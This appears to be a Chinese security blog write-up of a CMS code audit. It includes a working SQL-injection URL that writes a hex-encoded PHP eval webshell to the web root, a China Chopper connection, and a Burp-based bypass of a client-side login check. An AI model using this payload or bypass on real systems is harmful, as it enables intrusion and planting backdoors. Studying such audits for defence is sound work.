cms审计

CracerCracer 2016-4-8 渗透测试 1,845 0 4

首先使用审计工具rips扫描了下代码发现只有一个sql注入漏洞而且还在后台需要登录后才能触发

20160220114455569

于是手工翻了翻代码

20160220114504588

Get shell:(当mysql用户为root时,且需要web绝对路径)利用mysql写文件

Payload:
http://192.168.182.139/xrarticle/include/function.php?action=dj&num=-1%20union%20all%20select%20null,null,null,null,null,null,
0x3c3f70687020406576616c28245f504f53545b2768656c6c275d293b3f3e,
null,null,null,null,null,null%20into%20dumpfile%20%27C:/www/door.php%27%20--

在服务器上可以看到后门已经写到对应的目录下了

20160220114525504

配置菜刀连接后门

20160220114605198

20160220114614368

接下来看看rips扫到的另一处sql注入

/admin/About_Edit.php

20160220114624694

Id变量被拼接直接带入了SQL查询,所以此处又是一枚SQL注入,利用方式跟上一个类似,但是 该文件访问时会先执行这样一段代码:

20160220114644248

检查登录,接下来看看检查登录,来到ly_check.php

20160220114722954

发现该权限控制为检查session,如果是admin 则通过js重定向到登录页面,而没有else语句也就是说如果完成了echo语句,之后就执行后面的php代码,即认为以及授权为登录,
正确的应该为服务端的重定向,客户端是不可信任的,接下来是绕过方式之一:
访问admin/About_Edit.php
使用Burpsuit代理

20160220114735654

先Forward 第一个数据包

页面弹出了请重新登录

20160220114749270

Drop掉第二个请求认真页面的数据包

20160220114758790

然后:可以使用后台的修改功能了

 

 

转载请注明来自Cracer,本文标题:《cms审计》

喜欢 (4) 发布评论
发表评论


Top